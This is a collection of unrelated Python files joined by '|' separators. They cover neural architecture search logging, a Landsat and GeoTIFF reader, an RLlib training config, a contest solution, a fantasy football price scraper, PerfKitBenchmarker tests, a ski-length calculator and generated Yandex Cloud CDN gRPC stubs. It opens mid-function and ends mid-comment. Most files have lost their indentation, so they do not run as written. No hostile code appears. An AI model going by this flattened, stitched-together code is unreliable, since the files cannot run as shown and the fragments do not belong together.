trained_loss.append(mixed_loss)
RFS.trained_arch.append({'arch':sample, 'loss':mixed_loss,'gt':api[sample_geno]['mean_acc'],'losses':info["epoch_losses"]})
elif cfg.SPACE.NAME == 'proxyless':
            sample_geno = ''.join(sample.astype('str'))  # encode the sampled architecture as a digit string
trained_arch_darts.append((sample_geno))
mixed_loss, info = train_arch(sample)
mixed_loss = np.inf if np.isnan(mixed_loss) else mixed_loss
trained_loss.append(mixed_loss)
RFS.trained_arch.append({'arch':sample, 'loss':mixed_loss,'gt':info["flops"],'losses':info["epoch_losses"]})
logger.info("sample: {}, loss:{}".format(sample, mixed_loss))
start_time = time.time()
# ====== Warmup ======
warmup_samples = RFS.warmup_samples(cfg.RMINAS.RF_WARMUP)
logger.info("Warming up with {} archs".format(cfg.RMINAS.RF_WARMUP))
for sample in warmup_samples:
train_procedure(sample)
RFS.Warmup()
# ====== RF Sampling ======
sampling_time = time.time()
sampling_cnt= 0
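    # Keep drawing candidates from the random-forest sampler until sampling_cnt
    # reaches RF_SUCC; whatever RFS.Fitting() returns is accumulated into the count.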
while sampling_cnt < cfg.RMINAS.RF_SUCC:
print(sampling_cnt)
sample = RFS.fitting_samples()
train_procedure(sample)
sampling_cnt += RFS.Fitting()
if sampling_cnt >= cfg.RMINAS.RF_SUCC:
logger.info('successfully sampling good archs for {} times'.format(sampling_cnt))
else:
logger.info('failed sampling good archs for only {} times'.format(sampling_cnt))
logger.info('RF sampling time cost:{}'.format(str(time.time() - sampling_time)))
# ====== Evaluation ======
logger.info('Total time cost: {}'.format(str(time.time() - start_time)))
logger.info('Actual training times: {}'.format(len(RFS.trained_arch_index)))
if cfg.SPACE.NAME == 'infer_nb201':
logger.info('Searched architecture:\n{}'.format(str(RFS.optimal_arch(method='sum', top=50))))
logger.info('Searched architecture:\n{}'.format(str(RFS.optimal_arch(method='greedy', top=50))))
elif cfg.SPACE.NAME == 'infer_darts':
op_sample = RFS.optimal_arch(method='sum', top=50)
op_alpha = torch.from_numpy(np.r_[op_sample, op_sample])
op_geno = reformat_DARTS(geno_from_alpha(op_alpha))
logger.info('Searched architecture@top50:\n{}'.format(str(op_geno)))
elif cfg.SPACE.NAME == 'nasbenchmacro':
op_sample = RFS.optimal_arch(method='sum', top=50)
# op_alpha = torch.from_numpy(np.r_[op_sample, op_sample])
# op_geno = reformat_DARTS(geno_from_alpha(op_alpha))
logger.info('Searched architecture@top50:\n{}'.format(str(op_sample)))
print(api[op_sample]['mean_acc'])
elif cfg.SPACE.NAME == 'proxyless':
op_sample = RFS.optimal_arch(method='sum', top=100)
# op_alpha = torch.from_numpy(np.r_[op_sample, op_sample])
# op_geno = reformat_DARTS(geno_from_alpha(op_alpha))
logger.info('Searched architecture@top100:\n{}'.format(str(op_sample)))
        # print(api[op_sample]['mean_acc'])  # not applicable here: no tabular benchmark api is loaded for proxyless
if __name__ == '__main__':
main()
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 5 13:03:17 2017
@author: mschull
"""
from __future__ import division, print_function, absolute_import
__author__ = 'jwely'
__all__ = ["landsat_metadata"]
# standard imports
import os.path
import numpy as np
import logging
from .utils import RasterError,_test_outside
logging.basicConfig(level=logging.DEBUG)
LOGGER = logging.getLogger('pydisalexi.geotiff')
from osgeo import gdal, osr
try:
from pyproj import Proj
except ImportError:
LOGGER.warning(
"PROJ4 is not available. " +
"Any method requiring coordinate transform will fail.")
from datetime import datetime
import inspect
class landsat_metadata:
"""
    A landsat metadata object. This class builds its attributes
from the names of each tag in the xml formatted .MTL files that
come with landsat data. So, any tag that appears in the MTL file
will populate as an attribute of landsat_metadata.
    You can explore these attributes by using, for example
.. code-block:: python
from dnppy import landsat
meta = landsat.landsat_metadata(my_filepath) # create object
from pprint import pprint # import pprint
        pprint(vars(meta))                  # pretty print output
scene_id = meta.LANDSAT_SCENE_ID # access specific attribute
:param filename: the filepath to an MTL file.
"""
def __init__(self, filename):
"""
There are several critical attributes that keep a common
naming convention between all landsat versions, so they are
initialized in this class for good record keeping and reference
"""
# custom attribute additions
self.FILEPATH = filename
self.DATETIME_OBJ = None
# product metadata attributes
self.LANDSAT_SCENE_ID = None
self.DATA_TYPE = None
self.ELEVATION_SOURCE = None
self.OUTPUT_FORMAT = None
self.SPACECRAFT_ID = None
self.SENSOR_ID = None
self.WRS_PATH = None
self.WRS_ROW = None
self.NADIR_OFFNADIR = None
self.TARGET_WRS_PATH = None
self.TARGET_WRS_ROW = None
self.DATE_ACQUIRED = None
self.SCENE_CENTER_TIME = None
# image attributes
self.CLOUD_COVER = None
self.IMAGE_QUALITY_OLI = None
self.IMAGE_QUALITY_TIRS = None
self.ROLL_ANGLE = None
self.SUN_AZIMUTH = None
self.SUN_ELEVATION = None
self.EARTH_SUN_DISTANCE = None # calculated for Landsats before 8.
# read the file and populate the MTL attributes
self._read(filename)
def _read(self, filename):
""" reads the contents of an MTL file """
# if the "filename" input is actually already a metadata class object, return it back.
if inspect.isclass(filename):
return filename
fields = []
values = []
metafile = open(filename, 'r')
metadata = metafile.readlines()
for line in metadata:
# skips lines that contain "bad flags" denoting useless data AND lines
# greater than 1000 characters. 1000 character limit works around an odd LC5
# issue where the metadata has 40,000+ characters of whitespace
bad_flags = ["END", "GROUP"]
if not any(x in line for x in bad_flags) and len(line) <= 1000:
try:
line = line.replace(" ", "")
line = line.replace("\n", "")
field_name, field_value = line.split(' = ')
fields.append(field_name)
values.append(field_value)
                except ValueError:
                    # skip lines that are not simple "FIELD = value" pairs
                    pass
for i in range(len(fields)):
# format fields without quotes,dates, or times in them as floats
if not any(['"' in values[i], 'DATE' in fields[i], 'TIME' in fields[i]]):
setattr(self, fields[i], float(values[i]))
else:
values[i] = values[i].replace('"', '')
setattr(self, fields[i], values[i])
# create datetime_obj attribute (drop decimal seconds)
dto_string = self.DATE_ACQUIRED + self.SCENE_CENTER_TIME
self.DATETIME_OBJ = datetime.strptime(dto_string.split(".")[0], "%Y-%m-%d%H:%M:%S")
# only landsat 8 includes sun-earth-distance in MTL file, so calculate it
# for the Landsats 4,5,7 using solar module.
# if not self.SPACECRAFT_ID == "LANDSAT_8":
#
# # use 0s for lat and lon, sun_earth_distance is not a function of any one location on earth.
# s = solar(0, 0, self.DATETIME_OBJ, 0)
# self.EARTH_SUN_DISTANCE = s.get_rad_vector()
print("Scene {0} center time is {1}".format(self.LANDSAT_SCENE_ID, self.DATETIME_OBJ))
class GeoTIFF(object):
"""
Represents a GeoTIFF file for data access and processing and provides
a number of useful methods and attributes.
Arguments:
filepath (str): the full or relative file path
"""
def __init__(self, filepath):
try:
self.dataobj = gdal.Open(filepath)
except RuntimeError as err:
LOGGER.error("Could not open %s: %s" % (filepath, err.message))
raise
self.filepath = filepath
self.ncol = self.dataobj.RasterXSize
self.nrow = self.dataobj.RasterYSize
self.nbands = self.dataobj.RasterCount
self._gtr = self.dataobj.GetGeoTransform()
# see http://www.gdal.org/gdal_datamodel.html
self.ulx = self._gtr[0]
self.uly = self._gtr[3]
self.lrx = (self.ulx + self.ncol * self._gtr[1]
+ self.nrow * self._gtr[2])
self.lry = (self.uly + self.ncol * self._gtr[4]
+ self.nrow * self._gtr[5])
if self._gtr[2] != 0 or self._gtr[4] != 0:
LOGGER.warning(
"The dataset is not north-up. The geotransform is given "
+ "by: (%s). " % ', '.join([str(item) for item in self._gtr])
+ "Northing and easting values will not have expected meaning."
)
self.dataobj = None
@property
def data(self):
"""2D numpy array for single-band GeoTIFF file data. Otherwise, 3D. """
if not self.dataobj:
self.dataobj = gdal.Open(self.filepath)
dat = self.dataobj.ReadAsArray()
self.dataobj = None
return dat
@property
def projection(self):
"""The dataset's coordinate reference system as a Well-Known String"""
if not self.dataobj:
self.dataobj = gdal.Open(self.filepath)
dat = self.dataobj.GetProjection()
self.dataobj = None
return dat
@property
def proj4(self):
"""The dataset's coordinate reference system as a PROJ4 string"""
osrref = osr.SpatialReference()
osrref.ImportFromWkt(self.projection)
return osrref.ExportToProj4()
@property
def coordtrans(self):
"""A PROJ4 Proj object, which is able to perform coordinate
transformations"""
return Proj(self.proj4)
@property
def delx(self):
"""The sampling distance in x-direction, in physical units
(eg metres)"""
return self._gtr[1]
@property
def dely(self):
"""The sampling distance in y-direction, in physical units
(eg metres). Negative in northern hemisphere."""
return self._gtr[5]
@property
def easting(self):
"""The x-coordinates of first row pixel corners,
as a numpy array: upper-left corner of upper-left pixel
to upper-right corner of upper-right pixel (ncol+1)."""
delta = np.abs(
(self.lrx-self.ulx)/self.ncol
- self.delx
)
if delta > 10e-2:
            LOGGER.warning(
"GeoTIFF issue: E-W grid step differs from "
+ "deltaX by more than 1% ")
return np.linspace(self.ulx, self.lrx, self.ncol+1)
@property
def northing(self):
"""The y-coordinates of first column pixel corners,
as a numpy array: lower-left corner of lower-left pixel to
upper-left corner of upper-left pixel (nrow+1)."""
# check if data grid step is consistent
delta = np.abs(
(self.lry-self.uly)/self.nrow
- self.dely
)
if delta > 10e-2:
            LOGGER.warning(
"GeoTIFF issue: N-S grid step differs from "
+ "deltaY by more than 1% ")
return np.linspace(self.lry, self.uly, self.nrow+1)
@property
def x_pxcenter(self):
"""The x-coordinates of pixel centers, as a numpy array ncol."""
return np.linspace(
self.ulx + self.delx/2,
self.lrx - self.delx/2,
self.ncol)
@property
def y_pxcenter(self):
"""y-coordinates of pixel centers, nrow."""
return np.linspace(
self.lry - self.dely/2,
self.uly + self.dely/2,
self.nrow)
@property
def _XY(self):
"""Meshgrid of nrow+1, ncol+1 corner xy coordinates"""
return np.meshgrid(self.easting, self.northing)
@property
def _XY_pxcenter(self):
"""Meshgrid of nrow, ncol center xy coordinates"""
return np.meshgrid(self.x_pxcenter, self.y_pxcenter)
@property
def _LonLat_pxcorner(self):
"""Meshgrid of nrow+1, ncol+1 corner Lon/Lat coordinates"""
return self.coordtrans(*self._XY, inverse=True)
@property
def _LonLat_pxcenter(self):
"""Meshgrid of nrow, ncol center Lon/Lat coordinates"""
return self.coordtrans(*self._XY_pxcenter, inverse=True)
@property
def Lon(self):
"""Longitude coordinate of each pixel corner, as an array"""
return self._LonLat_pxcorner[0]
@property
def Lat(self):
"""Latitude coordinate of each pixel corner, as an array"""
return self._LonLat_pxcorner[1]
@property
def Lon_pxcenter(self):
"""Longitude coordinate of each pixel center, as an array"""
return self._LonLat_pxcenter[0]
@property
def Lat_pxcenter(self):
"""Latitude coordinate of each pixel center, as an array"""
return self._LonLat_pxcenter[1]
def ij2xy(self, i, j):
"""
Converts array index pair(s) to easting/northing coordinate pairs(s).
NOTE: array coordinate origin is in the top left corner whereas
easting/northing origin is in the bottom left corner. Easting and
northing are floating point numbers, and refer to the top-left corner
coordinate of the pixel. i runs from 0 to nrow-1, j from 0 to ncol-1.
For i=nrow and j=ncol, the bottom-right corner coordinate of the
bottom-right pixel will be returned. This is identical to the bottom-
right corner.
Arguments:
i (int): scalar or array of row coordinate index
j (int): scalar or array of column coordinate index
Returns:
x (float): scalar or array of easting coordinates
y (float): scalar or array of northing coordinates
"""
if (_test_outside(i, 0, self.nrow)
or _test_outside(j, 0, self.ncol)):
raise RasterError(
"Coordinates %d, %d out of bounds" % (i, j))
x = self.easting[0] + j * self.delx
y = self.northing[-1] + i * self.dely
return x, y
def xy2ij(self, x, y, precise=False):
"""
Convert easting/northing coordinate pair(s) to array coordinate
pairs(s).
NOTE: see note at ij2xy()
Arguments:
x (float): scalar or array of easting coordinates
y (float): scalar or array of northing coordinates
precise (bool): if true, return fractional array coordinates
Returns:
i (int, or float): scalar or array of row coordinate index
j (int, or float): scalar or array of column coordinate index
"""
if (_test_outside(x, self.easting[0], self.easting[-1]) or
_test_outside(y, self.northing[0], self.northing[-1])):
raise RasterError("Coordinates out of bounds")
i = (1 - (y - self.northing[0]) /
(self.northing[-1] - self.northing[0])) * self.nrow
j = ((x - self.easting[0]) /
(self.easting[-1] - self.easting[0])) * self.ncol
if precise:
return i, j
else:
return int(np.floor(i)), int(np.floor(j))
def simpleplot(self):
"""Quick and dirty plot of each band (channel, dataset) in the image.
Requires Matplotlib."""
import matplotlib.pyplot as plt
numbands = self.nbands
if numbands == 1:
plt.figure(figsize=(15, 10))
plt.imshow(self.data[:, :], cmap='bone')
elif numbands > 1:
for idx in range(numbands):
plt.figure(figsize=(15, 10))
plt.imshow(self.data[idx, :, :], cmap='bone')
return True
def clone(self, newpath, newdata):
"""
Creates new GeoTIFF object from existing: new data, same georeference.
Arguments:
newpath: valid file path
newdata: numpy array, 2 or 3-dim
Returns:
A raster.GeoTIFF object
"""
# convert Numpy dtype objects to GDAL type codes
# see https://gist.github.com/chryss/8366492
NPDTYPE2GDALTYPECODE = {
"uint8": 1,
"int8": 1,
"uint16": 2,
"int16": 3,
"uint32": 4,
"int32": 5,
"float32": 6,
"float64": 7,
"complex64": 10,
"complex128": 11,
}
# check if newpath is potentially a valid file path to save data
dirname, fname = os.path.split(newpath)
if dirname:
if not os.path.isdir(dirname):
print("%s is not a valid directory to save file to " % dirname)
if os.path.isdir(newpath):
LOGGER.warning(
"%s is a directory." % dirname + " Choose a name "
+ "that is suitable for writing a dataset to.")
if (newdata.shape != self.data.shape
and newdata.shape != self.data[0, ...].shape):
raise RasterError(
"New and cloned GeoTIFF dataset must be the same shape.")
dims = newdata.ndim
if dims == 2:
bands = 1
elif dims > 2:
bands = newdata.shape[0]
else:
raise RasterError(
"New data array has only %s dimensions." % dims)
try:
LOGGER.info(newdata.dtype.name)
LOGGER.info(NPDTYPE2GDALTYPECODE)
LOGGER.info(NPDTYPE2GDALTYPECODE[newdata.dtype.name])
gdaltype = NPDTYPE2GDALTYPECODE[newdata.dtype.name]
except KeyError as err:
raise RasterError(
"Data type in array %s " % newdata.dtype.name
+ "cannot be converted to GDAL data type: \n%s" % err.message)
proj = self.projection
geotrans = self._gtr
gtiffdr = gdal.GetDriverByName('GTiff')
gtiff = gtiffdr.Create(newpath, self.ncol, self.nrow, bands, gdaltype)
gtiff.SetProjection(proj)
gtiff.SetGeoTransform(geotrans)
if dims == 2:
gtiff.GetRasterBand(1).WriteArray(newdata)
else:
            for idx in range(bands):
gtiff.GetRasterBand(idx+1).WriteArray(newdata[idx, :, :])
gtiff = None
return GeoTIFF(newpath)
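
# A minimal usage sketch (file paths are hypothetical):
#
#     tif = GeoTIFF("scene_band4.tif")
#     print(tif.nrow, tif.ncol, tif.proj4)      # basic geometry and projection
#     arr = tif.data * 0.0001                   # e.g. apply a scale factor
#     tif.clone("scene_band4_scaled.tif", arr)  # same georeference, new values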
|
'''
Copyright (c) 2019, Ameer Haj Ali (UC Berkeley), and Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import ray
import ray.tune as tune
from ray.rllib.agents import ppo
from envs.neurovec import NeuroVectorizerEnv
from my_model import Code2VecModel
from ray.rllib.models import ModelCatalog
from ray.tune.registry import register_env
ray.init()
ModelCatalog.register_custom_model("my_model",Code2VecModel)
register_env("autovec", lambda config:NeuroVectorizerEnv(config))
tune.run_experiments({
"NeuroVectorizer": {
#"restore": "/Users/ameerh/Berkeley_Drive/PhD_berkeley/llvm-project/build/rlvectorizer/PPO_BanditEnv_0_2019-08-03_01-10-43lnjy3yyo/checkpoint_240/checkpoint-240",
"checkpoint_freq":1,
"run": "PPO",
"env": NeuroVectorizerEnv,
"stop": {"episodes_total": 500000},
"config": {
#"observation_filter": "NoFilter",
#"sample_batch_size": 10,
# "eager":True,
#"train_batch_size": 10,
#"sgd_minibatch_size": 10,
#"num_sgd_iter":3,
#"lr":5e-5,
#"vf_loss_coeff":0.5,
"horizon": 1,
"num_gpus": 0,
"model":{"custom_model": "my_model"},
"num_workers": 1,
"env_config":{'dirpath':'./training_data','new_rundir':'./new_garbage'}
},
},
})
|
# Sliding-window scan: count how many positions fall inside any window of
# width w and report the maximum such count.
infile = open('alienin.txt', 'r')
n, w = map(int, infile.readline().split())
list1 = []
for i in range(n):
    p = int(infile.readline())
    list1.append(p)
infile.close()
list1.sort()  # the two-pointer scan below assumes ascending positions

i, j = 0, 0
currentp = 0  # number of positions currently inside the window starting at list1[i]
answer = 0
while i < n:
    # advance j while list1[j] is still inside the window [list1[i], list1[i] + w)
    while j < n and list1[j] - list1[i] < w:
        currentp += 1
        j += 1
    answer = max(answer, currentp)
    currentp -= 1  # list1[i] leaves the window when the start advances
    i += 1

outfile = open('alienout.txt', 'w')
outfile.write(str(answer))
outfile.close()
|
import json
from player_stats_url import stats_url, top_50_url
class PriceData:
def __init__(self, web_object):
print('Getting player price change data...')
self.web_object = web_object
self.price_data_url = self.find_price_data_url()
self.player_price_data = self.get_player_price_data()
self.player_stats_data = self.get_player_stats_data()
self.player_top_50_data = self.get_top_50_data()
def find_price_data_url(self):
self.web_object.driver.get('http://www.fplstatistics.co.uk/')
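        # Chrome's 'performance' log holds DevTools events as JSON strings; the
        # Network response events are scanned to discover the dynamically created
        # AjaxPrices endpoint that serves the player price data.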
browser_log = self.web_object.driver.get_log('performance')
events = [json.loads(entry['message'])['message'] for entry in browser_log]
events = [event for event in events if 'Network.response' in event['method']]
for event in events:
if 'response' in event['params']:
if 'http://www.fplstatistics.co.uk/Home/AjaxPrices' in event['params']['response']['url']:
return event['params']['response']['url']
def get_player_stats_data(self):
return json.loads(self.web_object.session.get(stats_url).text)['aaData']
def get_top_50_data(self):
return json.loads(self.web_object.session.get(top_50_url).text)['aaData']
def get_player_price_data(self):
return json.loads(self.web_object.session.get(self.price_data_url).text)['aaData']
|
# Copyright 2014 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
from perfkitbenchmarker import sample
from six.moves import range
class SampleTestCase(unittest.TestCase):
def testMetadataOptional(self):
instance = sample.Sample(metric='Test', value=1.0, unit='Mbps')
self.assertDictEqual({}, instance.metadata)
def testProvidedMetadataSet(self):
metadata = {'origin': 'unit test'}
instance = sample.Sample(metric='Test', value=1.0, unit='Mbps',
metadata=metadata.copy())
self.assertDictEqual(metadata, instance.metadata)
class TestPercentileCalculator(unittest.TestCase):
def testPercentileCalculator(self):
numbers = list(range(0, 1001))
percentiles = sample.PercentileCalculator(numbers,
percentiles=[0, 1, 99.9, 100])
self.assertEqual(percentiles['p0'], 0)
self.assertEqual(percentiles['p1'], 10)
self.assertEqual(percentiles['p99.9'], 999)
self.assertEqual(percentiles['p100'], 1000)
self.assertEqual(percentiles['average'], 500)
# 4 percentiles we requested, plus average and stddev
self.assertEqual(len(percentiles), 6)
def testNoNumbers(self):
with self.assertRaises(ValueError):
sample.PercentileCalculator([], percentiles=[0, 1, 99])
def testOutOfRangePercentile(self):
with self.assertRaises(ValueError):
sample.PercentileCalculator([3], percentiles=[-1])
def testWrongTypePercentile(self):
with self.assertRaises(ValueError):
sample.PercentileCalculator([3], percentiles=['a'])
if __name__ == '__main__':
unittest.main()
|
class Skier:
def __init__(self, length, age, style):
self.length = length
self.age = age
self.style = style
classic = 'classic'
freestyle = 'freestyle'
_MAX_SUPPORTED_CLASSIC_SKI_LENGTH = 207
def calculate_ski_length(skier):
if skier.age <= 4:
return _calculate_baby_ski_length(skier)
if skier.age <= 8:
return _calculate_child_ski_length(skier)
if skier.style == Skier.classic:
return _calculate_classic_ski_length(skier)
if skier.style == Skier.freestyle:
return _calculate_freestyle_ski_length(skier)
raise ValueError(f"Ski style {skier.style} is unsupported")
def _calculate_baby_ski_length(skier):
return (skier.length, skier.length)
def _calculate_child_ski_length(skier):
return (skier.length + 10, skier.length + 20)
def _calculate_classic_ski_length(skier):
ski_length_min, ski_length_max = (skier.length + 20, skier.length + 20)
if ski_length_max > _MAX_SUPPORTED_CLASSIC_SKI_LENGTH:
raise ValueError(f"Calculated classic ski length is {ski_length_max}, "
"max supported length is {_MAX_SUPPORTED_CLASSIC_SKI_LENGTH}")
return ski_length_min, ski_length_max
def _calculate_freestyle_ski_length(skier):
return (skier.length + 10, skier.length + 15)
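
# A minimal usage sketch (values are illustrative):
if __name__ == '__main__':
    adult = Skier(length=180, age=35, style=Skier.classic)
    print(calculate_ski_length(adult))   # (200, 200) under the rules above
    child = Skier(length=120, age=7, style=Skier.freestyle)
    print(calculate_ski_length(child))   # (130, 140): the child rule applies before style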
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from yandex.cloud.cdn.v1 import origin_pb2 as yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__pb2
from yandex.cloud.cdn.v1 import origin_service_pb2 as yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2
from yandex.cloud.operation import operation_pb2 as yandex_dot_cloud_dot_operation_dot_operation__pb2
class OriginServiceStub(object):
"""
Origin management service.
Origin is not a standalone entity. It can live only within origin group.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Get = channel.unary_unary(
'/yandex.cloud.cdn.v1.OriginService/Get',
request_serializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.GetOriginRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__pb2.Origin.FromString,
)
self.List = channel.unary_unary(
'/yandex.cloud.cdn.v1.OriginService/List',
request_serializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.ListOriginsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.ListOriginsResponse.FromString,
)
self.Create = channel.unary_unary(
'/yandex.cloud.cdn.v1.OriginService/Create',
request_serializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.CreateOriginRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Update = channel.unary_unary(
'/yandex.cloud.cdn.v1.OriginService/Update',
request_serializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.UpdateOriginRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Delete = channel.unary_unary(
'/yandex.cloud.cdn.v1.OriginService/Delete',
request_serializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.DeleteOriginRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
class OriginServiceServicer(object):
"""
Origin management service.
Origin is not a standalone entity. It can live only within origin group.
"""
def Get(self, request, context):
"""Get origin in origin group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def List(self, request, context):
"""Lists origins of origin group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Create(self, request, context):
"""Creates origin inside origin group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Update(self, request, context):
"""Updates origin from origin group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Delete(self, request, context):
"""Deletes origin from origin group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_OriginServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'Get': grpc.unary_unary_rpc_method_handler(
servicer.Get,
request_deserializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.GetOriginRequest.FromString,
response_serializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__pb2.Origin.SerializeToString,
),
'List': grpc.unary_unary_rpc_method_handler(
servicer.List,
request_deserializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.ListOriginsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.ListOriginsResponse.SerializeToString,
),
'Create': grpc.unary_unary_rpc_method_handler(
servicer.Create,
request_deserializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.CreateOriginRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Update': grpc.unary_unary_rpc_method_handler(
servicer.Update,
request_deserializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.UpdateOriginRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Delete': grpc.unary_unary_rpc_method_handler(
servicer.Delete,
request_deserializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.DeleteOriginRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'yandex.cloud.cdn.v1.OriginService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class OriginService(object):
"""
Origin management service.
Origin is not a standalone entity. It can live only within origin group.
"""
@staticmethod
def Get(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.cdn.v1.OriginService/Get',
yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.GetOriginRequest.SerializeToString,
yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__pb2.Origin.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def List(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.cdn.v1.OriginService/List',
yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.ListOriginsRequest.SerializeToString,
yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.ListOriginsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Create(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.cdn.v1.OriginService/Create',
yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.CreateOriginRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Update(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.cdn.v1.OriginService/Update',
yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.UpdateOriginRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Delete(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.cdn.v1.OriginService/Delete',
yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.DeleteOriginRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
|
# 2021 June 4 14:44
# The solution is based on a rather magical algorithm called:
# Reservoir Sampling
# Naturally, we'd think of traversing the entire linked list to learn its
# length, then sampling a random index and traversing again to fetch that
# element, or else storing the elements in a list. But these approaches are
# either not "one-pass" solutions or require additional space.
#
# Without traversing the entire list FIRST (which eventually the algo will), we
